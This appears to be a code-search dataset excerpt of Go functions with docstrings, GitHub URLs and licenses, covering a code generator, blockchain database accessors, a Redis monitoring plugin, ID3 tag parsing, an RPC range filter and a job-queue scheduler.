sort.Slice(result, func(left int, right int) bool {
lTypeName, err := extractEmbeddedTypeName(result[left].PropertyType())
if err != nil {
panic(err)
}
rTypeName, err := extractEmbeddedTypeName(result[right].PropertyType())
if err != nil {
panic(err)
}
return lTypeName.Name() < rTypeName.Name()
})
return result
}
func (objectType *ObjectType) Functions() []Function {
var functions []Function
for _, f := range objectType.functions {
functions = append(functions, f)
}
sort.Slice(functions, func(i int, j int) bool {
return functions[i].Name() < functions[j].Name()
})
return functions
}
func (objectType *ObjectType) HasFunctionWithName(name string) bool {
_, ok := objectType.functions[name]
return ok
}
func (objectType *ObjectType) AsType(codeGenerationContext *CodeGenerationContext) dst.Expr {
var fields []*dst.Field
for _, f := range objectType.EmbeddedProperties() {
fields = append(fields, f.AsField(codeGenerationContext))
}
for _, f := range objectType.Properties() {
fields = append(fields, f.AsField(codeGenerationContext))
}
if len(fields) > 0 {
fields[0].Decs.Before = dst.NewLine
}
return &dst.StructType{
Fields: &dst.FieldList{
List: fields,
},
}
}
func (objectType *ObjectType) AsZero(_ Types, _ *CodeGenerationContext) dst.Expr {
panic("cannot create a zero value for an object type")
}
func (objectType *ObjectType) RequiredPackageReferences() *PackageReferenceSet {
result := NewPackageReferenceSet()
for _, property := range objectType.embedded {
propertyType := property.PropertyType()
result.Merge(propertyType.RequiredPackageReferences())
}
for _, property := range objectType.properties {
propertyType := property.PropertyType()
result.Merge(propertyType.RequiredPackageReferences())
}
for _, function := range objectType.functions {
result.Merge(function.RequiredPackageReferences())
}
result.Merge(objectType.InterfaceImplementer.RequiredPackageReferences())
return result
}
func (objectType *ObjectType) References() TypeNameSet {
results := NewTypeNameSet()
for _, property := range objectType.properties {
results = results.AddAll(property.PropertyType().References())
}
for _, property := range objectType.embedded {
results = results.AddAll(property.PropertyType().References())
}
return results
}
func (objectType *ObjectType) Equals(t Type) bool {
if objectType == t {
return true
}
other, ok := t.(*ObjectType)
if !ok {
return false
}
if len(objectType.embedded) != len(other.embedded) {
return false
}
for n, f := range other.embedded {
ourProperty, ok := objectType.embedded[n]
if !ok {
return false
}
if !ourProperty.Equals(f) {
return false
}
}
if len(objectType.properties) != len(other.properties) {
return false
}
for n, f := range other.properties {
ourProperty, ok := objectType.properties[n]
if !ok {
return false
}
if !ourProperty.Equals(f) {
return false
}
}
if len(objectType.functions) != len(other.functions) {
return false
}
for name, function := range other.functions {
ourFunction, ok := objectType.functions[name]
if !ok {
return false
}
if !ourFunction.Equals(function) {
return false
}
}
if len(objectType.testcases) != len(other.testcases) {
return false
}
for name, testcase := range other.testcases {
ourCase, ok := objectType.testcases[name]
if !ok {
return false
}
if !ourCase.Equals(testcase) {
return false
}
}
return objectType.InterfaceImplementer.Equals(other.InterfaceImplementer)
}
func (objectType *ObjectType) WithProperty(property *PropertyDefinition) *ObjectType {
result := objectType.copy()
result.properties[property.propertyName] = property
return result
}
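// Editorial sketch (not part of the original file): the With* methods here are
// copy-on-write; each returns a fresh *ObjectType and leaves the receiver untouched,
// so intermediate types can be shared safely:
func copyOnWriteSketch(base *ObjectType, f Function) (original, modified *ObjectType) {
	modified = base.WithFunction(f) // base keeps its old function set
	return base, modified
}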
func (objectType *ObjectType) WithProperties(properties ...*PropertyDefinition) *ObjectType {
result := objectType.copy()
for _, f := range properties {
result.properties[f.propertyName] = f
}
return result
}
func (objectType *ObjectType) WithEmbeddedProperties(properties ...*PropertyDefinition) (*ObjectType, error) {
result := objectType.copy()
for _, p := range properties {
err := objectType.checkEmbeddedProperty(p)
if err != nil {
return objectType, err
}
typeName, err := extractEmbeddedTypeName(p.PropertyType())
if err != nil {
return objectType, err
}
result.embedded[typeName] = p
}
return result, nil
}
func (objectType *ObjectType) WithoutProperties() *ObjectType {
result := objectType.copy()
result.properties = make(map[PropertyName]*PropertyDefinition)
return result
}
func (objectType *ObjectType) WithoutProperty(name PropertyName) *ObjectType {
result := objectType.copy()
delete(result.properties, name)
return result
}
func (objectType *ObjectType) WithoutEmbeddedProperty(name TypeName) *ObjectType {
result := objectType.copy()
delete(result.embedded, name)
return result
}
func (objectType *ObjectType) WithoutEmbeddedProperties() *ObjectType {
result := objectType.copy()
result.embedded = make(map[TypeName]*PropertyDefinition)
return result
}
func (objectType *ObjectType) checkEmbeddedProperty(property *PropertyDefinition) error {
if property.PropertyName() != "" {
return errors.Errorf("embedded property name must be empty, was: %s", property.PropertyName())
}
return nil
}
func (objectType *ObjectType) WithEmbeddedProperty(property *PropertyDefinition) (*ObjectType, error) {
err := objectType.checkEmbeddedProperty(property)
if err != nil {
return objectType, err
}
typeName, err := extractEmbeddedTypeName(property.PropertyType())
if err != nil {
return objectType, err
}
result := objectType.copy()
result.embedded[typeName] = property
return result, nil
} | MIT License |
dappledger/annchain | eth/core/rawdb/accessors_chain.go | ReadBody | go | func ReadBody(db DatabaseReader, hash common.Hash, number uint64) *types.Body {
data := ReadBodyRLP(db, hash, number)
if len(data) == 0 {
return nil
}
body := new(types.Body)
if err := rlp.Decode(bytes.NewReader(data), body); err != nil {
log.Error("Invalid block body RLP", "hash", hash, "err", err)
return nil
}
return body
} | ReadBody retrieves the block body corresponding to the hash. | https://github.com/dappledger/annchain/blob/916cc142c344937c01c5459270a64cb133f95c08/eth/core/rawdb/accessors_chain.go#L213-L224 | package rawdb
import (
"bytes"
"encoding/binary"
"math/big"
"github.com/dappledger/AnnChain/eth/common"
"github.com/dappledger/AnnChain/eth/core/types"
"github.com/dappledger/AnnChain/eth/log"
"github.com/dappledger/AnnChain/eth/rlp"
)
func ReadCanonicalHash(db DatabaseReader, number uint64) common.Hash {
data, _ := db.Get(headerHashKey(number))
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteCanonicalHash(db DatabaseWriter, hash common.Hash, number uint64) {
if err := db.Put(headerHashKey(number), hash.Bytes()); err != nil {
log.Crit("Failed to store number to hash mapping", "err", err)
}
}
func DeleteCanonicalHash(db DatabaseDeleter, number uint64) {
if err := db.Delete(headerHashKey(number)); err != nil {
log.Crit("Failed to delete number to hash mapping", "err", err)
}
}
func ReadHeaderNumber(db DatabaseReader, hash common.Hash) *uint64 {
data, _ := db.Get(headerNumberKey(hash))
if len(data) != 8 {
return nil
}
number := binary.BigEndian.Uint64(data)
return &number
}
func ReadHeadHeaderHash(db DatabaseReader) common.Hash {
data, _ := db.Get(headHeaderKey)
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteHeadHeaderHash(db DatabaseWriter, hash common.Hash) {
if err := db.Put(headHeaderKey, hash.Bytes()); err != nil {
log.Crit("Failed to store last header's hash", "err", err)
}
}
func ReadHeadBlockHash(db DatabaseReader) common.Hash {
data, _ := db.Get(headBlockKey)
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteHeadBlockHash(db DatabaseWriter, hash common.Hash) {
if err := db.Put(headBlockKey, hash.Bytes()); err != nil {
log.Crit("Failed to store last block's hash", "err", err)
}
}
func ReadHeadFastBlockHash(db DatabaseReader) common.Hash {
data, _ := db.Get(headFastBlockKey)
if len(data) == 0 {
return common.Hash{}
}
return common.BytesToHash(data)
}
func WriteHeadFastBlockHash(db DatabaseWriter, hash common.Hash) {
if err := db.Put(headFastBlockKey, hash.Bytes()); err != nil {
log.Crit("Failed to store last fast block's hash", "err", err)
}
}
func ReadFastTrieProgress(db DatabaseReader) uint64 {
data, _ := db.Get(fastTrieProgressKey)
if len(data) == 0 {
return 0
}
return new(big.Int).SetBytes(data).Uint64()
}
func WriteFastTrieProgress(db DatabaseWriter, count uint64) {
if err := db.Put(fastTrieProgressKey, new(big.Int).SetUint64(count).Bytes()); err != nil {
log.Crit("Failed to store fast sync trie progress", "err", err)
}
}
func ReadHeaderRLP(db DatabaseReader, hash common.Hash, number uint64) rlp.RawValue {
data, _ := db.Get(headerKey(number, hash))
return data
}
func HasHeader(db DatabaseReader, hash common.Hash, number uint64) bool {
if has, err := db.Has(headerKey(number, hash)); !has || err != nil {
return false
}
return true
}
func ReadHeader(db DatabaseReader, hash common.Hash, number uint64) *types.Header {
data := ReadHeaderRLP(db, hash, number)
if len(data) == 0 {
return nil
}
header := new(types.Header)
if err := rlp.Decode(bytes.NewReader(data), header); err != nil {
log.Error("Invalid block header RLP", "hash", hash, "err", err)
return nil
}
return header
}
func WriteHeader(db DatabaseWriter, header *types.Header) {
var (
hash = header.Hash()
number = header.Number.Uint64()
encoded = encodeBlockNumber(number)
)
key := headerNumberKey(hash)
if err := db.Put(key, encoded); err != nil {
log.Crit("Failed to store hash to number mapping", "err", err)
}
data, err := rlp.EncodeToBytes(header)
if err != nil {
log.Crit("Failed to RLP encode header", "err", err)
}
key = headerKey(number, hash)
if err := db.Put(key, data); err != nil {
log.Crit("Failed to store header", "err", err)
}
}
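// Editorial sketch (not part of the original file): WriteHeader and ReadHeader form a
// round trip keyed by (number, hash); the header is RLP-encoded on write, decoded on
// read, and a hash-to-number index entry is maintained alongside. Assuming w and r are
// backed by the same underlying database:
func headerRoundTripSketch(w DatabaseWriter, r DatabaseReader, header *types.Header) *types.Header {
	WriteHeader(w, header)
	return ReadHeader(r, header.Hash(), header.Number.Uint64())
}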
func DeleteHeader(db DatabaseDeleter, hash common.Hash, number uint64) {
if err := db.Delete(headerKey(number, hash)); err != nil {
log.Crit("Failed to delete header", "err", err)
}
if err := db.Delete(headerNumberKey(hash)); err != nil {
log.Crit("Failed to delete hash to number mapping", "err", err)
}
}
func ReadBodyRLP(db DatabaseReader, hash common.Hash, number uint64) rlp.RawValue {
data, _ := db.Get(blockBodyKey(number, hash))
return data
}
func WriteBodyRLP(db DatabaseWriter, hash common.Hash, number uint64, rlp rlp.RawValue) {
if err := db.Put(blockBodyKey(number, hash), rlp); err != nil {
log.Crit("Failed to store block body", "err", err)
}
}
func HasBody(db DatabaseReader, hash common.Hash, number uint64) bool {
if has, err := db.Has(blockBodyKey(number, hash)); !has || err != nil {
return false
}
return true
} | Apache License 2.0 |
mackerelio/mackerel-agent-plugins | mackerel-plugin-redis/lib/redis.go | GraphDefinition | go | func (m RedisPlugin) GraphDefinition() map[string]mp.Graphs {
labelPrefix := strings.Title(m.Prefix)
var graphdef = map[string]mp.Graphs{
"queries": {
Label: (labelPrefix + " Queries"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "total_commands_processed", Label: "Queries", Diff: true},
},
},
"connections": {
Label: (labelPrefix + " Connections"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "total_connections_received", Label: "Connections", Diff: true, Stacked: true},
{Name: "rejected_connections", Label: "Rejected Connections", Diff: true, Stacked: true},
},
},
"clients": {
Label: (labelPrefix + " Clients"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "connected_clients", Label: "Connected Clients", Diff: false, Stacked: true},
{Name: "blocked_clients", Label: "Blocked Clients", Diff: false, Stacked: true},
{Name: "connected_slaves", Label: "Connected Slaves", Diff: false, Stacked: true},
},
},
"keys": {
Label: (labelPrefix + " Keys"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "keys", Label: "Keys", Diff: false},
{Name: "expires", Label: "Keys with expiration", Diff: false},
{Name: "expired", Label: "Expired Keys", Diff: true},
{Name: "evicted_keys", Label: "Evicted Keys", Diff: true},
},
},
"keyspace": {
Label: (labelPrefix + " Keyspace"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "keyspace_hits", Label: "Keyspace Hits", Diff: true},
{Name: "keyspace_misses", Label: "Keyspace Missed", Diff: true},
},
},
"memory": {
Label: (labelPrefix + " Memory"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "used_memory", Label: "Used Memory", Diff: false},
{Name: "used_memory_rss", Label: "Used Memory RSS", Diff: false},
{Name: "used_memory_peak", Label: "Used Memory Peak", Diff: false},
{Name: "used_memory_lua", Label: "Used Memory Lua engine", Diff: false},
},
},
"capacity": {
Label: (labelPrefix + " Capacity"),
Unit: "percentage",
Metrics: []mp.Metrics{
{Name: "percentage_of_memory", Label: "Percentage of memory", Diff: false},
{Name: "percentage_of_clients", Label: "Percentage of clients", Diff: false},
},
},
"uptime": {
Label: (labelPrefix + " Uptime"),
Unit: "integer",
Metrics: []mp.Metrics{
{Name: "uptime_in_seconds", Label: "Uptime In Seconds", Diff: false},
},
},
}
network := "tcp"
address := net.JoinHostPort(m.Host, m.Port)
if m.Socket != "" {
network = "unix"
address = m.Socket
}
c, err := redis.Dial(network, address, redis.DialConnectTimeout(time.Duration(m.Timeout)*time.Second))
if err != nil {
logger.Errorf("Failed to connect redis. %s", err)
return nil
}
defer c.Close()
if m.Password != "" {
if err = authenticateByPassword(c, m.Password); err != nil {
return nil
}
}
str, err := redis.String(c.Do("info"))
if err != nil {
logger.Errorf("Failed to run info command. %s", err)
return nil
}
var metricsLag []mp.Metrics
var metricsOffsetDelay []mp.Metrics
for _, line := range strings.Split(str, "\r\n") {
if line == "" {
continue
}
record := strings.SplitN(line, ":", 2)
if len(record) < 2 {
continue
}
key, _ := record[0], record[1]
if re, _ := regexp.MatchString("^slave\\d+", key); re {
metricsLag = append(metricsLag, mp.Metrics{Name: fmt.Sprintf("%s_lag", key), Label: fmt.Sprintf("Replication lag to %s", key), Diff: false})
metricsOffsetDelay = append(metricsOffsetDelay, mp.Metrics{Name: fmt.Sprintf("%s_offset_delay", key), Label: fmt.Sprintf("Offset delay to %s", key), Diff: false})
}
}
if len(metricsLag) > 0 {
graphdef["lag"] = mp.Graphs{
Label: (labelPrefix + " Slave Lag"),
Unit: "seconds",
Metrics: metricsLag,
}
}
if len(metricsOffsetDelay) > 0 {
graphdef["offset_delay"] = mp.Graphs{
Label: (labelPrefix + " Slave Offset Delay"),
Unit: "count",
Metrics: metricsOffsetDelay,
}
}
return graphdef
} | GraphDefinition interface for mackerelplugin | https://github.com/mackerelio/mackerel-agent-plugins/blob/fc5a856e6b341e4a9c508505789b5f2004549760/mackerel-plugin-redis/lib/redis.go#L221-L355 | package mpredis
import (
"flag"
"fmt"
"net"
"os"
"regexp"
"strconv"
"strings"
"time"
"github.com/gomodule/redigo/redis"
mp "github.com/mackerelio/go-mackerel-plugin-helper"
"github.com/mackerelio/golib/logging"
)
var logger = logging.GetLogger("metrics.plugin.redis")
type RedisPlugin struct {
Host string
Port string
Password string
Socket string
Prefix string
Timeout int
Tempfile string
ConfigCommand string
}
func authenticateByPassword(c redis.Conn, password string) error {
if _, err := c.Do("AUTH", password); err != nil {
logger.Errorf("Failed to authenticate. %s", err)
return err
}
return nil
}
func (m RedisPlugin) fetchPercentageOfMemory(c redis.Conn, stat map[string]interface{}) error {
res, err := redis.StringMap(c.Do(m.ConfigCommand, "GET", "maxmemory"))
if err != nil {
logger.Errorf("Failed to run `%s GET maxmemory` command. %s", m.ConfigCommand, err)
return err
}
maxsize, err := strconv.ParseFloat(res["maxmemory"], 64)
if err != nil {
logger.Errorf("Failed to parse maxmemory. %s", err)
return err
}
if maxsize == 0.0 {
stat["percentage_of_memory"] = 0.0
} else {
stat["percentage_of_memory"] = 100.0 * stat["used_memory"].(float64) / maxsize
}
return nil
}
func (m RedisPlugin) fetchPercentageOfClients(c redis.Conn, stat map[string]interface{}) error {
res, err := redis.StringMap(c.Do(m.ConfigCommand, "GET", "maxclients"))
if err != nil {
logger.Errorf("Failed to run `%s GET maxclients` command. %s", m.ConfigCommand, err)
return err
}
maxsize, err := strconv.ParseFloat(res["maxclients"], 64)
if err != nil {
logger.Errorf("Failed to parse maxclients. %s", err)
return err
}
stat["percentage_of_clients"] = 100.0 * stat["connected_clients"].(float64) / maxsize
return nil
}
func (m RedisPlugin) calculateCapacity(c redis.Conn, stat map[string]interface{}) error {
if err := m.fetchPercentageOfMemory(c, stat); err != nil {
return err
}
return m.fetchPercentageOfClients(c, stat)
}
func (m RedisPlugin) MetricKeyPrefix() string {
if m.Prefix == "" {
m.Prefix = "redis"
}
return m.Prefix
}
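// Editorial sketch (not part of the original file): FetchMetrics below walks the redis
// INFO reply line by line; plain lines are "key:value" while keyspace lines look like
// "db0:keys=10,expires=2,avg_ttl=0". The first form in isolation:
func parseInfoLineSketch(line string) (key, value string, ok bool) {
	record := strings.SplitN(line, ":", 2)
	if len(record) < 2 {
		return "", "", false
	}
	return record[0], record[1], true
}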
func (m RedisPlugin) FetchMetrics() (map[string]interface{}, error) {
network := "tcp"
address := net.JoinHostPort(m.Host, m.Port)
if m.Socket != "" {
network = "unix"
address = m.Socket
}
c, err := redis.Dial(network, address, redis.DialConnectTimeout(time.Duration(m.Timeout)*time.Second))
if err != nil {
logger.Errorf("Failed to connect redis. %s", err)
return nil, err
}
defer c.Close()
if m.Password != "" {
if err = authenticateByPassword(c, m.Password); err != nil {
return nil, err
}
}
str, err := redis.String(c.Do("info"))
if err != nil {
logger.Errorf("Failed to run info command. %s", err)
return nil, err
}
stat := make(map[string]interface{})
keysStat := 0.0
expiresStat := 0.0
var slaves []string
for _, line := range strings.Split(str, "\r\n") {
if line == "" {
continue
}
if re, _ := regexp.MatchString("^#", line); re {
continue
}
record := strings.SplitN(line, ":", 2)
if len(record) < 2 {
continue
}
key, value := record[0], record[1]
if re, _ := regexp.MatchString("^slave\\d+", key); re {
slaves = append(slaves, key)
kv := strings.Split(value, ",")
var offset, lag string
if len(kv) == 5 {
_, _, _, offset, lag = kv[0], kv[1], kv[2], kv[3], kv[4]
lagKv := strings.SplitN(lag, "=", 2)
lagFv, err := strconv.ParseFloat(lagKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse slaves. %s", err)
} else {
stat[fmt.Sprintf("%s_lag", key)] = lagFv
}
} else {
_, _, _, offset = kv[0], kv[1], kv[2], kv[3]
}
offsetKv := strings.SplitN(offset, "=", 2)
offsetFv, err := strconv.ParseFloat(offsetKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse slaves. %s", err)
continue
}
stat[fmt.Sprintf("%s_offset_delay", key)] = offsetFv
continue
}
if re, _ := regexp.MatchString("^db", key); re {
kv := strings.SplitN(value, ",", 3)
keys, expires := kv[0], kv[1]
keysKv := strings.SplitN(keys, "=", 2)
keysFv, err := strconv.ParseFloat(keysKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse db keys. %s", err)
} else {
keysStat += keysFv
}
expiresKv := strings.SplitN(expires, "=", 2)
expiresFv, err := strconv.ParseFloat(expiresKv[1], 64)
if err != nil {
logger.Warningf("Failed to parse db expires. %s", err)
} else {
expiresStat += expiresFv
}
continue
}
v, err := strconv.ParseFloat(value, 64)
if err != nil {
continue
}
stat[key] = v
}
stat["keys"] = keysStat
stat["expires"] = expiresStat
if _, ok := stat["expired_keys"]; ok {
stat["expired"] = stat["expired_keys"]
} else {
stat["expired"] = 0.0
}
if m.ConfigCommand != "" {
if err := m.calculateCapacity(c, stat); err != nil {
logger.Infof("Failed to calculate capacity. (The cause may be that AWS Elasticache Redis has no `%s` command.) Skip these metrics. %s", m.ConfigCommand, err)
}
}
for _, slave := range slaves {
stat[fmt.Sprintf("%s_offset_delay", slave)] = stat["master_repl_offset"].(float64) - stat[fmt.Sprintf("%s_offset_delay", slave)].(float64)
}
return stat, nil
} | Apache License 2.0 |
cloudcloud/go-id3 | frames/frame.go | GetBytePercent | go | func GetBytePercent(b []byte, sig uint) int {
div := float64(len(b) * 256 / (9 - int(sig)))
i := float64(GetSize(b, sig))
x := math.Ceil((i / div) * 100)
return int(x)
} | GetBytePercent will fetch an int from a byte as a percentage | https://github.com/cloudcloud/go-id3/blob/5dd963bb16c2d4153607256d4a3262e5d7f7afe6/frames/frame.go#L158-L164 | package frames
import (
"encoding/binary"
"fmt"
"math"
"strconv"
"strings"
"unicode/utf16"
"unicode/utf8"
)
type IFrame interface {
DisplayContent() string
GetExplain() string
GetLength() int
GetName() string
Init(n, d string, s int)
ProcessData(int, []byte) IFrame
}
type FrameFile interface {
Close() error
Read([]byte) (int, error)
Seek(int64, int) (int64, error)
Write([]byte) (int, error)
}
const (
Version2 = 2
Version3 = 3
Version4 = 4
LengthUnicode = 2
LengthStandard = 1
)
type Frame struct {
Name string `json:"name"`
Version int `json:"-" yaml:"-"`
Description string `json:"description"`
Data []byte `json:"-" yaml:"-"`
Cleaned string `json:"cleaned"`
Size int `json:"size"`
Flags int `json:"flags"`
TagPreserve bool `json:"tag_preserve"`
FilePreserve bool `json:"file_preserve"`
ReadOnly bool `json:"read_only"`
Compression bool `json:"compression"`
Encryption bool `json:"encryption"`
Grouping bool `json:"grouping"`
Utf16 bool `json:"utf16"`
}
func GetStr(b []byte) string {
str := string(b)
if !utf8.ValidString(str) {
r := make([]rune, 0, len(str))
for i, v := range str {
if v == utf8.RuneError {
_, size := utf8.DecodeRuneInString(str[i:])
if size == 1 {
continue
}
}
r = append(r, v)
}
str = string(r)
}
return strings.Trim(str, " \t\n\r\x00")
}
func GetUnicodeStr(d []byte) string {
byteOrder := []byte{d[0], d[1]}
var b binary.ByteOrder
d = d[2:]
resp := ""
if len(d) > 1 {
if byteOrder[0] == '\xFF' && byteOrder[1] == '\xFE' {
b = binary.LittleEndian
} else if byteOrder[0] == '\xFE' && byteOrder[1] == '\xFF' {
b = binary.BigEndian
}
str := make([]uint16, 0, len(d)/2)
for i := 0; i < len(d); i += 2 {
str = append(str, b.Uint16(d[i:i+2]))
}
resp = string(utf16.Decode(str))
}
return resp
}
func GetInt(b []byte) int {
s, _ := strconv.Atoi(GetStr(b))
return s
}
func GetBitInt(b byte, ltr bool, l int) int {
r := 0
if !ltr {
for a := 0; a < l; a++ {
r += int(b << uint(a*8))
}
}
return r
}
func GetDirectInt(b byte) int {
i, _ := strconv.Atoi(fmt.Sprintf("%d", b))
return i
}
func GetBoolBit(b byte, i uint) bool {
n := byte(1 << i)
return (b & n) == n
}
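// Editorial sketch (not part of the original file): GetSize below folds the bytes
// together, shifting the accumulator by sig bits per byte; with sig=7 this decodes
// ID3 synchsafe integers, e.g. {0x00, 0x00, 0x02, 0x01} -> 2<<7 | 1 = 257:
func synchsafeSizeSketch() int {
	return GetSize([]byte{0x00, 0x00, 0x02, 0x01}, 7) // 257
}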
func GetSize(b []byte, sig uint) int {
s := 0
for _, b := range b {
s = s << sig
s |= int(b)
}
return s
} | Apache License 2.0 |
plaid/plaid-go | plaid/model_transaction_stream_amount.go | HasAmount | go | func (o *TransactionStreamAmount) HasAmount() bool {
if o != nil && o.Amount != nil {
return true
}
return false
} | HasAmount returns a boolean if a field has been set. | https://github.com/plaid/plaid-go/blob/c2a20f380d37eecba36138b04e14f540b59cc22a/plaid/model_transaction_stream_amount.go#L66-L72 | package plaid
import (
"encoding/json"
)
type TransactionStreamAmount struct {
Amount *float32 `json:"amount,omitempty"`
IsoCurrencyCode NullableString `json:"iso_currency_code,omitempty"`
UnofficialCurrencyCode NullableString `json:"unofficial_currency_code,omitempty"`
AdditionalProperties map[string]interface{}
}
type _TransactionStreamAmount TransactionStreamAmount
func NewTransactionStreamAmount() *TransactionStreamAmount {
this := TransactionStreamAmount{}
return &this
}
func NewTransactionStreamAmountWithDefaults() *TransactionStreamAmount {
this := TransactionStreamAmount{}
return &this
}
func (o *TransactionStreamAmount) GetAmount() float32 {
if o == nil || o.Amount == nil {
var ret float32
return ret
}
return *o.Amount
}
func (o *TransactionStreamAmount) GetAmountOk() (*float32, bool) {
if o == nil || o.Amount == nil {
return nil, false
}
return o.Amount, true
} | MIT License |
gallactic/gallactic | rpc/filter.go | GetRangeFilter | go | func GetRangeFilter(op, fName string) (func(a, b uint64) bool, error) {
if op == "==" {
return func(a, b uint64) bool {
return a == b
}, nil
} else if op == "!=" {
return func(a, b uint64) bool {
return a != b
}, nil
} else if op == "<=" {
return func(a, b uint64) bool {
return a <= b
}, nil
} else if op == ">=" {
return func(a, b uint64) bool {
return a >= b
}, nil
} else if op == "<" {
return func(a, b uint64) bool {
return a < b
}, nil
} else if op == ">" {
return func(a, b uint64) bool {
return a > b
}, nil
} else {
return nil, fmt.Errorf("Op: " + op + " is not supported for '" + fName + "' filtering")
}
} | Some standard filtering functions. | https://github.com/gallactic/gallactic/blob/35e1da6e1a539d823279da9d429725e6fba3b332/rpc/filter.go#L92-L120 | package rpc
import (
"fmt"
"math"
"strconv"
"strings"
)
type Filter interface {
Match(v interface{}) bool
}
type ConfigurableFilter interface {
Filter
Configure(*FilterData) error
}
type FilterData struct {
Field string `json:"field"`
Op string `json:"op"`
Value string `json:"value"`
}
type CompositeFilter struct {
filters []Filter
}
func (cf *CompositeFilter) SetData(filters []Filter) {
cf.filters = filters
}
func (cf *CompositeFilter) Match(v interface{}) bool {
for _, f := range cf.filters {
if !f.Match(v) {
return false
}
}
return true
}
type MatchAllFilter struct{}
func (maf *MatchAllFilter) Match(v interface{}) bool { return true }
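// Editorial sketch (not part of the original file): GetRangeFilter in this file maps an
// operator string to a comparison closure; a typical call site looks like this:
func rangeFilterUsageSketch() (bool, error) {
	le, err := GetRangeFilter("<=", "height")
	if err != nil {
		return false, err
	}
	return le(3, 5), nil // true, since 3 <= 5
}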
func ParseNumberValue(value string) (uint64, error) {
var val uint64
if value == "min" {
val = 0
} else if value == "max" {
val = math.MaxUint64
} else {
tv, err := strconv.ParseUint(value, 10, 64)
if err != nil {
return 0, fmt.Errorf("Wrong value type.")
}
val = tv
}
return val, nil
} | MIT License |
olivere/jobqueue | manager.go | schedule | go | func (m *Manager) schedule() {
m.testSchedulerStarted()
defer m.testSchedulerStopped()
t := time.NewTicker(1 * time.Second)
defer t.Stop()
for {
select {
case <-t.C:
for {
job, err := m.st.Next()
if err == ErrNotFound {
break
}
if err != nil {
m.logger.Printf("jobqueue: error picking next job to schedule: %v", err)
break
}
if job == nil {
break
}
m.mu.Lock()
concurrency := m.concurrency[job.Rank]
working := m.working[job.Rank]
m.mu.Unlock()
if working >= concurrency {
break
}
m.mu.Lock()
job.State = Working
job.Started = time.Now().UnixNano()
err = m.st.Update(context.Background(), job)
if err != nil {
m.mu.Unlock()
m.logger.Printf("jobqueue: error updating job: %v", err)
break
}
rank := job.Rank
m.working[rank]++
m.mu.Unlock()
m.testJobScheduled()
m.jobc[rank] <- job
}
case <-m.stopSched:
m.stopSched <- struct{}{}
return
}
}
} | -- Scheduler --
schedule periodically picks up waiting jobs and passes them to idle workers. | https://github.com/olivere/jobqueue/blob/517172f3c5dfbcf4f548a2631ce4c277f2f54060/manager.go#L315-L365 | package jobqueue
import (
"context"
"errors"
"fmt"
"sync"
"time"
"github.com/google/uuid"
)
const (
defaultConcurrency = 5
)
func nop() {}
type Manager struct {
logger Logger
st Store
backoff BackoffFunc
mu sync.Mutex
tm map[string]Processor
concurrency map[int]int
working map[int]int
started bool
workers map[int][]*worker
stopSched chan struct{}
workersWg sync.WaitGroup
jobc map[int]chan *Job
startupBehaviour StartupBehaviour
testManagerStarted func()
testManagerStopped func()
testSchedulerStarted func()
testSchedulerStopped func()
testJobAdded func()
testJobScheduled func()
testJobStarted func()
testJobRetry func()
testJobFailed func()
testJobSucceeded func()
}
func New(options ...ManagerOption) *Manager {
m := &Manager{
logger: stdLogger{},
st: NewInMemoryStore(),
backoff: exponentialBackoff,
tm: make(map[string]Processor),
concurrency: map[int]int{0: defaultConcurrency},
working: map[int]int{0: 0},
startupBehaviour: None,
testManagerStarted: nop,
testManagerStopped: nop,
testSchedulerStarted: nop,
testSchedulerStopped: nop,
testJobAdded: nop,
testJobScheduled: nop,
testJobStarted: nop,
testJobRetry: nop,
testJobFailed: nop,
testJobSucceeded: nop,
}
for _, opt := range options {
opt(m)
}
return m
}
type ManagerOption func(*Manager)
func SetLogger(logger Logger) ManagerOption {
return func(m *Manager) {
m.logger = logger
}
}
func SetStore(store Store) ManagerOption {
return func(m *Manager) {
m.st = store
}
}
func SetBackoffFunc(fn BackoffFunc) ManagerOption {
return func(m *Manager) {
if fn != nil {
m.backoff = fn
} else {
m.backoff = exponentialBackoff
}
}
}
func SetConcurrency(rank, n int) ManagerOption {
return func(m *Manager) {
if n <= 1 {
m.concurrency[rank] = 1
} else {
m.concurrency[rank] = n
}
}
}
type StartupBehaviour int
const (
None StartupBehaviour = iota
MarkAsFailed
)
func SetStartupBehaviour(b StartupBehaviour) ManagerOption {
return func(m *Manager) {
m.startupBehaviour = b
}
}
func (m *Manager) Register(topic string, p Processor) error {
m.mu.Lock()
defer m.mu.Unlock()
if _, found := m.tm[topic]; found {
return fmt.Errorf("jobqueue: topic %s already registered", topic)
}
m.tm[topic] = p
return nil
}
func (m *Manager) Start() error {
m.mu.Lock()
defer m.mu.Unlock()
if m.started {
return errors.New("jobqueue: manager already started")
}
err := m.st.Start(m.startupBehaviour)
if err != nil {
return err
}
m.jobc = make(map[int]chan *Job)
m.workers = make(map[int][]*worker)
for rank, concurrency := range m.concurrency {
m.jobc[rank] = make(chan *Job, concurrency)
m.workers[rank] = make([]*worker, concurrency)
for i := 0; i < m.concurrency[rank]; i++ {
m.workersWg.Add(1)
m.workers[rank][i] = newWorker(m, m.jobc[rank])
}
}
m.stopSched = make(chan struct{})
go m.schedule()
m.started = true
m.testManagerStarted()
return nil
}
func (m *Manager) Stop() error {
return m.Close()
}
func (m *Manager) Close() error {
return m.CloseWithTimeout(-1 * time.Second)
}
func (m *Manager) CloseWithTimeout(timeout time.Duration) error {
m.mu.Lock()
if !m.started {
m.mu.Unlock()
return nil
}
m.mu.Unlock()
m.stopSched <- struct{}{}
<-m.stopSched
close(m.stopSched)
m.mu.Lock()
for rank := range m.jobc {
close(m.jobc[rank])
}
m.mu.Unlock()
if timeout.Nanoseconds() < 0 {
m.workersWg.Wait()
m.testManagerStopped()
return nil
}
complete := make(chan struct{}, 1)
go func() {
m.workersWg.Wait()
close(complete)
}()
var err error
select {
case <-complete:
case <-time.After(timeout):
err = errors.New("jobqueue: close timed out")
}
m.mu.Lock()
m.started = false
m.mu.Unlock()
